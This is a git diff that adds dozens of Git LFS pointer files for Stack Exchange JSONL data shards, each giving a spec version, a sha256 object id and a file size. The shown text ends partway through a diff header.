0000000000000000000000000000000000000000..81d62691569122a1dcc83d0259d94a563f68588c --- /dev/null +++ b/data/stackexchange/1-1/422_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:470f0ad70486b10069ca8e89b0edf5fea967ad8b22a2a37b11aea0cc6c0a2ae8 +size 37087833 diff --git a/data/stackexchange/1-1/423_2289.jsonl b/data/stackexchange/1-1/423_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..df3bb170008a6f7f0b9242f1292965af20d34bc5 --- /dev/null +++ b/data/stackexchange/1-1/423_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:76dad85a11e341389518c7aba17d1079929ad7ea2120048d3f39cb351e09079f +size 36568299 diff --git a/data/stackexchange/1-1/424_2289.jsonl b/data/stackexchange/1-1/424_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..828e6c859a3845add936a657ff83869d54758a2d --- /dev/null +++ b/data/stackexchange/1-1/424_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:efffd356d13c775d27f14b7d6c353c44f736de6d9067cbc57a8824afded227b3 +size 36632023 diff --git a/data/stackexchange/1-1/425_2289.jsonl b/data/stackexchange/1-1/425_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9ed616cda93138531941febecb4218dfba5025c4 --- /dev/null +++ b/data/stackexchange/1-1/425_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fa6c3dfb4e97a3a3c474f90848a878daec9b9b87066b9a923baf7f62106963c4 +size 36534511 diff --git a/data/stackexchange/1-1/426_2289.jsonl b/data/stackexchange/1-1/426_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4362d7be0faaa03f83d649c8919e928147eaddf6 --- /dev/null +++ b/data/stackexchange/1-1/426_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5d18d814a13b56f0ddef642346767f96c75d4d211e912f6a72d533c530d8bbc1 +size 36212720 diff --git a/data/stackexchange/1-1/427_2289.jsonl b/data/stackexchange/1-1/427_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..98d971578a9e40f6751bb82b9b1e76344cd87f37 --- /dev/null +++ b/data/stackexchange/1-1/427_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d697185193598a01698f048fd3fe72046c0bd15ad0cb09a73016657a4b0f3154 +size 36325019 diff --git a/data/stackexchange/1-1/428_2289.jsonl b/data/stackexchange/1-1/428_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..518558097700902884d0bbc7f0f6ea753e2e1dff --- /dev/null +++ b/data/stackexchange/1-1/428_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:99e75908e8c12b705f36600db38d47444b5cbdee3b81289c647b5bcaad2bd1c2 +size 36357555 diff --git a/data/stackexchange/1-1/429_2289.jsonl b/data/stackexchange/1-1/429_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c5c13de149927cf6c1b3769419d4cfe2546b347e --- /dev/null +++ b/data/stackexchange/1-1/429_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e3041f800db6d50a3c0489d44e0021b60a5e96c907f21a506de752b434e91ee4 +size 36418642 diff --git a/data/stackexchange/1-1/42_2289.jsonl b/data/stackexchange/1-1/42_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..0a04f9fd27f60e6bcc691ce18b321eef7ff41326 --- /dev/null +++ b/data/stackexchange/1-1/42_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3d65ccf05312bcbba46257183d56825eb94107b134ba3efb2fe3e6a0f7b89ef7 +size 35808563 diff --git a/data/stackexchange/1-1/430_2289.jsonl b/data/stackexchange/1-1/430_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..33c67a8dc64c343be581a4caab838f53fd417a89 --- /dev/null +++ b/data/stackexchange/1-1/430_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f1b6dc5ef52a2387dfeec46c4f40b1037c9f76b1219076b7972837bc6579ff0f +size 36022594 diff --git a/data/stackexchange/1-1/431_2289.jsonl b/data/stackexchange/1-1/431_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b43cd192250c2a36b239f52b248f71487131775c --- /dev/null +++ b/data/stackexchange/1-1/431_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:40c8738acac439f7a50db86cac63fbcb74e8336d22da53883727530e452e21e9 +size 36229787 diff --git a/data/stackexchange/1-1/432_2289.jsonl b/data/stackexchange/1-1/432_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c74f9c5f99156f18ceeafcf20fd15746ca60bc94 --- /dev/null +++ b/data/stackexchange/1-1/432_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:386d109da5b59eef484b93d8ba3143a7496739abf1bd6989b4a2618e1b09348d +size 36198311 diff --git a/data/stackexchange/1-1/433_2289.jsonl b/data/stackexchange/1-1/433_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e368c530cf6aa6d551c031d3ac0687b995fc0a2e --- /dev/null +++ b/data/stackexchange/1-1/433_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5cf6efa64cb00299e0753bf3dd9da939f535a60a0217a54839055c00b0080558 +size 35617144 diff --git a/data/stackexchange/1-1/434_2289.jsonl b/data/stackexchange/1-1/434_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..49a4c2dc1382e20553a1c5334b78b854596215d9 --- /dev/null +++ b/data/stackexchange/1-1/434_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7e5ecc3b947e55b3415058efaff2aff1a6ffb7deec03a8ebc74bda0e0138ba02 +size 35935751 diff --git a/data/stackexchange/1-1/435_2289.jsonl b/data/stackexchange/1-1/435_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4434e686acbe846ff9a911c57cc433d25d3d3965 --- /dev/null +++ b/data/stackexchange/1-1/435_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:05e58fbacef63f7e8e17ceb4b0c02c65f4dcd689dedaa157a60de6673fcb8f44 +size 36580903 diff --git a/data/stackexchange/1-1/436_2289.jsonl b/data/stackexchange/1-1/436_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..e668bd5dff12a176b10410328dbe11f9c6555831 --- /dev/null +++ b/data/stackexchange/1-1/436_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3be182d9d6ca0d4fa364d29d023e294a55f68ebcbdafa8f55ae5a11baeb654c2 +size 36465106 diff --git a/data/stackexchange/1-1/437_2289.jsonl b/data/stackexchange/1-1/437_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..da66c5f2ce9b5016a32f287803ef12bc9aee19d2 --- /dev/null +++ b/data/stackexchange/1-1/437_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:574ca8feab082a2d64c2e7193a9748b94ac9aca065976531260a9aca57d750e9 +size 35984938 diff --git a/data/stackexchange/1-1/438_2289.jsonl b/data/stackexchange/1-1/438_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f8620c804789f5c1c6b2b3b552cd1f1203690938 --- /dev/null +++ b/data/stackexchange/1-1/438_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ce6ddc30612c76fdb493960e6050c8dfac2988c23c8a832c63bbd131a78ecdb2 +size 36149793 diff --git a/data/stackexchange/1-1/439_2289.jsonl b/data/stackexchange/1-1/439_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b4f40150ff0bf6d987cc1e5e52a5d87271039ba2 --- /dev/null +++ b/data/stackexchange/1-1/439_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4005bcaadc42b313fdff55916ee7fd75af4a60300cee4aa25ab419993f1faede +size 36559510 diff --git a/data/stackexchange/1-1/43_2289.jsonl b/data/stackexchange/1-1/43_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f3387c95f35b11fa8c6fa69c20ea74e492ac0e53 --- /dev/null +++ b/data/stackexchange/1-1/43_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aed827c7580c4ffcd3ae4a4ebe41bc1290fe6ddae908df6328387923e12b5190 +size 35832740 diff --git a/data/stackexchange/1-1/440_2289.jsonl b/data/stackexchange/1-1/440_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..77990dafd3d31f56a38877aadb088da735ffaae9 --- /dev/null +++ b/data/stackexchange/1-1/440_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:926e8cdc79b36f593d543b1a7fbb4e297c564a4e7d2b42247336faeb08c2f071 +size 36183495 diff --git a/data/stackexchange/1-1/441_2289.jsonl b/data/stackexchange/1-1/441_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bbde4be561c67a135f0047c069a3ee091c2f4b66 --- /dev/null +++ b/data/stackexchange/1-1/441_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:88891d0183cdb5592a7832b6b65cb0ac8135c4a3ab7c03a520335ac87f581333 +size 36790110 diff --git a/data/stackexchange/1-1/442_2289.jsonl b/data/stackexchange/1-1/442_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..f7d8186991ba88280fba300f5ae007ce95f41e41 --- /dev/null +++ b/data/stackexchange/1-1/442_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4913bf1d150f56fe0cdb041384d7c69ce3325d02a04d6b06388bf8107d574053 +size 36598927 diff --git a/data/stackexchange/1-1/443_2289.jsonl b/data/stackexchange/1-1/443_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ae43c3fd81feadae235e3cc8b9724038636cd379 --- /dev/null +++ b/data/stackexchange/1-1/443_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d01bfaff9e009dcf5817a8118c92c665cfca1f49371abbc68ad037148c8e5a89 +size 35965967 diff --git a/data/stackexchange/1-1/444_2289.jsonl b/data/stackexchange/1-1/444_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5e6c4479b34f10d1af3ad6486a14f4c1b3a3edb1 --- /dev/null +++ b/data/stackexchange/1-1/444_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:398fac5898c4acfcd63837170aac9d15edada6c81d6e54be79a78d63b52714a8 +size 36028572 diff --git a/data/stackexchange/1-1/445_2289.jsonl b/data/stackexchange/1-1/445_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ea187775965f7a3084fbe59baf5f3857293d3ff3 --- /dev/null +++ b/data/stackexchange/1-1/445_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2400feb93a86fdb52cacfe63236a8849e7f0edd060857246223adfd6a6f5bb99 +size 36300113 diff --git a/data/stackexchange/1-1/446_2289.jsonl b/data/stackexchange/1-1/446_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a9285c9644664a3c4eb47c46b9ec6507df74f47a --- /dev/null +++ b/data/stackexchange/1-1/446_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:097929c36d2fd4e27e91ffc9a89e55cae112b41606f3473e88cd8a2cc37bfe10 +size 35866502 diff --git a/data/stackexchange/1-1/447_2289.jsonl b/data/stackexchange/1-1/447_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..69cc78a2b149e2cadf7d9958276d0dc91adc3710 --- /dev/null +++ b/data/stackexchange/1-1/447_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:93bdf03c5ce88c3103e0e8c04c1c5f89d77446e904e76bbc47693b17d5541378 +size 36409658 diff --git a/data/stackexchange/1-1/448_2289.jsonl b/data/stackexchange/1-1/448_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a64fad8ccbf7fdb1d42419009d864d61078084e9 --- /dev/null +++ b/data/stackexchange/1-1/448_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:75308c1d51e931bd9299c79753fe6ec2549f1bdcbe8aed82f0cada82998e504c +size 36646971 diff --git a/data/stackexchange/1-1/449_2289.jsonl b/data/stackexchange/1-1/449_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..38d56cbce95591cd3a40a030a7d3a1d4837e8ace --- /dev/null +++ b/data/stackexchange/1-1/449_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e67bf5b268f44a8a645ffb3b306d9e348334ca171294b3ee62f53c40e00303cf +size 36583859 diff --git a/data/stackexchange/1-1/44_2289.jsonl b/data/stackexchange/1-1/44_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..4ccf3527ad46549b6d1258d1e788bfd09ce076a3 --- /dev/null +++ b/data/stackexchange/1-1/44_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1643b352dfa26d6e7bd6ea7c6504f6cda8ed1532618e46686c601d087b30d2f5 +size 35722458 diff --git a/data/stackexchange/1-1/450_2289.jsonl b/data/stackexchange/1-1/450_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..bd66ef2eae2a7bf02b32295e7e9e473bc0d17886 --- /dev/null +++ b/data/stackexchange/1-1/450_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:67f317f5c4049780fe8298669ec34e30046633485fbed3aafbac3d4037510060 +size 39739146 diff --git a/data/stackexchange/1-1/451_2289.jsonl b/data/stackexchange/1-1/451_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..19832a13331af2ca46381d106952cd1fa9052952 --- /dev/null +++ b/data/stackexchange/1-1/451_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:520de81191e93ef5c50b0af2f91624394df906d067b53757b5ff69a8b4672f22 +size 40111133 diff --git a/data/stackexchange/1-1/452_2289.jsonl b/data/stackexchange/1-1/452_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ef7be1d0f750dcd7a3f53c5fb71205a807348020 --- /dev/null +++ b/data/stackexchange/1-1/452_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f72027ab3fc38fc2e98676887d77ef59591ad386ad469991c1f204cdfbc6cc14 +size 40600850 diff --git a/data/stackexchange/1-1/453_2289.jsonl b/data/stackexchange/1-1/453_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..73b90a89850b8ed362507898eb1c9a5efd1d3dcf --- /dev/null +++ b/data/stackexchange/1-1/453_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:07d7fa9dc9ddb0b7ab8eef3b825dfe3f7e6becb6c0de315449cfedfd20e2032d +size 39757487 diff --git a/data/stackexchange/1-1/454_2289.jsonl b/data/stackexchange/1-1/454_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..856593a11b0489f9e1bc50b9f0a872303ba3f2b6 --- /dev/null +++ b/data/stackexchange/1-1/454_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7fe97460065071a6b2e6d49134dc7d6034effc1d6436dfbbe659dc3178d27d3d +size 39776268 diff --git a/data/stackexchange/1-1/455_2289.jsonl b/data/stackexchange/1-1/455_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a85306e7deede2f163429de895db606f3bc1bc68 --- /dev/null +++ b/data/stackexchange/1-1/455_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:94fd980680872256659786272b82fc9b0c94dd94094a33d1483a85941975da8f +size 40816868 diff --git a/data/stackexchange/1-1/456_2289.jsonl b/data/stackexchange/1-1/456_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9aadec33a9ae31a9a1146b61c38a8224f44312de --- /dev/null +++ b/data/stackexchange/1-1/456_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:45325005d0da92a9499fefd22fc9f6194da1dbbb80a161751c6aa99175f95537 +size 39728763 diff --git a/data/stackexchange/1-1/457_2289.jsonl b/data/stackexchange/1-1/457_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c09efee7628a5c74e38608b4bb7aa53c4cea7ede --- /dev/null +++ b/data/stackexchange/1-1/457_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cb5bde2c73ad2434327efbc967a69914f72bdaada1b6cc144c9ef092115b11ce +size 40183886 diff --git a/data/stackexchange/1-1/458_2289.jsonl b/data/stackexchange/1-1/458_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5104f8a77e050be4f51dccc2ae43caba2dae388c --- /dev/null +++ b/data/stackexchange/1-1/458_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f59969d6c1f4bb60e78005f5524653bbc54a000bdc5524c09d07c3d8e68da127 +size 40027346 diff --git a/data/stackexchange/1-1/459_2289.jsonl b/data/stackexchange/1-1/459_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..95356b3b7c34754b6b6435f5a29a7a83238dd943 --- /dev/null +++ b/data/stackexchange/1-1/459_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b5963fa308de353c523cfeefdd71f2e350a453382b2ccdd711050c1ff53763d +size 40332957 diff --git a/data/stackexchange/1-1/45_2289.jsonl b/data/stackexchange/1-1/45_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..053ad4ca3ab7382ea95898dac7802f194f807b23 --- /dev/null +++ b/data/stackexchange/1-1/45_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:07922e59893f39a24177476012ec15d49998df880039361461c6ac4416ed81e6 +size 35598572 diff --git a/data/stackexchange/1-1/460_2289.jsonl b/data/stackexchange/1-1/460_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d06400e45436b8eca95d1b67858db6b638159caa --- /dev/null +++ b/data/stackexchange/1-1/460_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5de1de9075e7b9cbaf3f7d14b147db0cb65f26f3633392490a36e7b3d0ecede2 +size 39987954 diff --git a/data/stackexchange/1-1/461_2289.jsonl b/data/stackexchange/1-1/461_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2e35010918acc847c25f6f0cb05f9c24d0d312a3 --- /dev/null +++ b/data/stackexchange/1-1/461_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:07eebb9ee7e02c040889442160cb36488358b2d2776087476e2332f53da5f3a5 +size 40623897 diff --git a/data/stackexchange/1-1/462_2289.jsonl b/data/stackexchange/1-1/462_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c7cb51a166c9226006927a197e9c492e20349ae0 --- /dev/null +++ b/data/stackexchange/1-1/462_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a9e579aa5bc546a39deb082eec2efba0371006ab15ffc136aa7ece80f3fefb23 +size 40679270 diff --git a/data/stackexchange/1-1/463_2289.jsonl b/data/stackexchange/1-1/463_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1317f5b345a09349c57766ff9c93ec96af9cd645 --- /dev/null +++ b/data/stackexchange/1-1/463_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:aa31d1a2084087f8628547dc364a941a86c2c0637813aca6ebeb97174ebb27e1 +size 40462401 diff --git a/data/stackexchange/1-1/464_2289.jsonl b/data/stackexchange/1-1/464_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a4778238013bc39c64c3727d030ae9798a1212c6 --- /dev/null +++ b/data/stackexchange/1-1/464_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6d08d188ffac34a3676e0a94c2f32726bb2671ebca587b2df2be99f75fc55219 +size 40434077 diff --git a/data/stackexchange/1-1/465_2289.jsonl b/data/stackexchange/1-1/465_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..d275787856d44b9e5a446db12e890e9c02d791d9 --- /dev/null +++ b/data/stackexchange/1-1/465_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e78ef2ea752d964486d580ccc4195caf6cf6078540c5c8d3cc3ff3c0c3a62713 +size 39840897 diff --git a/data/stackexchange/1-1/466_2289.jsonl b/data/stackexchange/1-1/466_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..a363a1a27b7b27acec33083ea420628c3b0dc40d --- /dev/null +++ b/data/stackexchange/1-1/466_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:73bb25969e9d6974de42de04f38dd75adfc3dac3012bd392147f347a6f79bc8e +size 40850458 diff --git a/data/stackexchange/1-1/467_2289.jsonl b/data/stackexchange/1-1/467_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ba53dd7f6fd1d4204ed3eac5cadd3c88e583c905 --- /dev/null +++ b/data/stackexchange/1-1/467_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:17b1a23b701bd8fa83f91c841c2af1f274effb31bc6520d94cb7de6820f475d6 +size 40582748 diff --git a/data/stackexchange/1-1/468_2289.jsonl b/data/stackexchange/1-1/468_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..5a8f70e6c40ba24eac271a0ae410dcaa040c3c6c --- /dev/null +++ b/data/stackexchange/1-1/468_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6362c3bf90c5d39d594684eb26c274be4717ad53ad28680c9cc53ef440d4a5fc +size 39993199 diff --git a/data/stackexchange/1-1/469_2289.jsonl b/data/stackexchange/1-1/469_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..17b95df4950d7c7a5b8ce8d2cd29edc5317627ab --- /dev/null +++ b/data/stackexchange/1-1/469_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f8291f97c8ed052c0ec42e493588c98169ec5d066461d7683c41ed19c78112f6 +size 40515045 diff --git a/data/stackexchange/1-1/46_2289.jsonl b/data/stackexchange/1-1/46_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..b74c6e8effeed809f24bbe5d075d636e180042fb --- /dev/null +++ b/data/stackexchange/1-1/46_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:bf86a72f8f2c80a83103bd36785d8c5f3daeb61a5aa852370fd1463953a57b5d +size 35515619 diff --git a/data/stackexchange/1-1/470_2289.jsonl b/data/stackexchange/1-1/470_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..1640c7afc1970461bccff5e1b383b294e2c61f15 --- /dev/null +++ b/data/stackexchange/1-1/470_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:25be264cb7902d131cd54bd44c4dd8bd1c5bcd217b371f63ceb6280619758e2b +size 40141723 diff --git a/data/stackexchange/1-1/471_2289.jsonl b/data/stackexchange/1-1/471_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..df911b85d8b881bf1dee4fb088d4419a62e96854 --- /dev/null +++ b/data/stackexchange/1-1/471_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ead7695108cecf120a5176d1565322812c040ce9d423991e181f4f9a6b9e3241 +size 40343744 diff --git a/data/stackexchange/1-1/472_2289.jsonl b/data/stackexchange/1-1/472_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..51dc1e2723f4b3816e6ec3f52132f00fde323db1 --- /dev/null +++ b/data/stackexchange/1-1/472_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:fefbd3247d252822296ef2dbd2b815390ded3923f9b41efbc7c0f3ca93d25a90 +size 40812072 diff --git a/data/stackexchange/1-1/473_2289.jsonl b/data/stackexchange/1-1/473_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..c0a2e118e0ccc6c65afde999d9131ec8688f4ab9 --- /dev/null +++ b/data/stackexchange/1-1/473_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f67e61a5171b840cd4c28913ac1ca14715b9d57e18b09c0ff4d473fd367b4eb9 +size 39476615 diff --git a/data/stackexchange/1-1/474_2289.jsonl b/data/stackexchange/1-1/474_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ba1c2049411e9dd4ed06451fadb420957b72aad8 --- /dev/null +++ b/data/stackexchange/1-1/474_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0045a6ace2095c3320c25b2829e93f2b51345039ca1267deedefd9cf2ea23adf +size 40040550 diff --git a/data/stackexchange/1-1/475_2289.jsonl b/data/stackexchange/1-1/475_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..9c8e74a284b8509fee3606f84e3dcac07a961997 --- /dev/null +++ b/data/stackexchange/1-1/475_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b5663c2dd7f5fe3016fa2a5d6640436c8f448a6303160dc87b468a02a991bde2 +size 40066313 diff --git a/data/stackexchange/1-1/476_2289.jsonl b/data/stackexchange/1-1/476_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..dc0b5d0127f57a435b26fc1964b092da9d736429 --- /dev/null +++ b/data/stackexchange/1-1/476_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:02706830b12f2a9f618c05ea1c061faf392fa9f548e7d8d3fa2e35dec10d6b6f +size 39873305 diff --git a/data/stackexchange/1-1/477_2289.jsonl b/data/stackexchange/1-1/477_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..8b03c756aeecc9d50e2e456ad7057512a3d68b57 --- /dev/null +++ b/data/stackexchange/1-1/477_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:928deede8a5b811fcef1a48a04de5e9219f8192f506d321fed6149ad9741ecb8 +size 39958624 diff --git a/data/stackexchange/1-1/478_2289.jsonl b/data/stackexchange/1-1/478_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..64277a806f476268292541320366ffba1b0c9e07 --- /dev/null +++ b/data/stackexchange/1-1/478_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:685ccf128a36a09dee5b14522e89885f0333afb9be2a1b56b6d322bb7d6df036 +size 40383453 diff --git a/data/stackexchange/1-1/479_2289.jsonl b/data/stackexchange/1-1/479_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..125c0ba3d864c6ce44604749e4991d425732d2c7 --- /dev/null +++ b/data/stackexchange/1-1/479_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4d6b8b08dc5480d3ebd27a99b4e33b496362f57c66c87900e0dcf5966af2cbd9 +size 40337027 diff --git a/data/stackexchange/1-1/47_2289.jsonl b/data/stackexchange/1-1/47_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..93935ed8e06f4aa7c08bafe3222c4f73c3c1d709 --- /dev/null +++ b/data/stackexchange/1-1/47_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:2933d43fcb3d6234be93d75469669af029bddd680280066a15ed987e6363c262 +size 36318416 diff --git a/data/stackexchange/1-1/480_2289.jsonl b/data/stackexchange/1-1/480_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..2049a0473c975e8eb829101b9ad0178c3332109f --- /dev/null +++ b/data/stackexchange/1-1/480_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3473c4d4da6737e58500df5ffa32cef7a030810bf7716b0d125ae37edee44f49 +size 40156351 diff --git a/data/stackexchange/1-1/481_2289.jsonl b/data/stackexchange/1-1/481_2289.jsonl new file mode 100644 index 0000000000000000000000000000000000000000..ea833ab258be7c19cc5042f9fba799536366f7c2 --- /dev/null +++ b/data/stackexchange/1-1/481_2289.jsonl @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cc7543fed464dc84bb0a654c474cda75c0af6534e5316ccbf028e06b06169bee +size 40081801 diff --git a/data/stackexchange/1-1/482_2289.jsonl b/data/stackexchange/1-1/482_2289.jsonl new file mode 100644 index 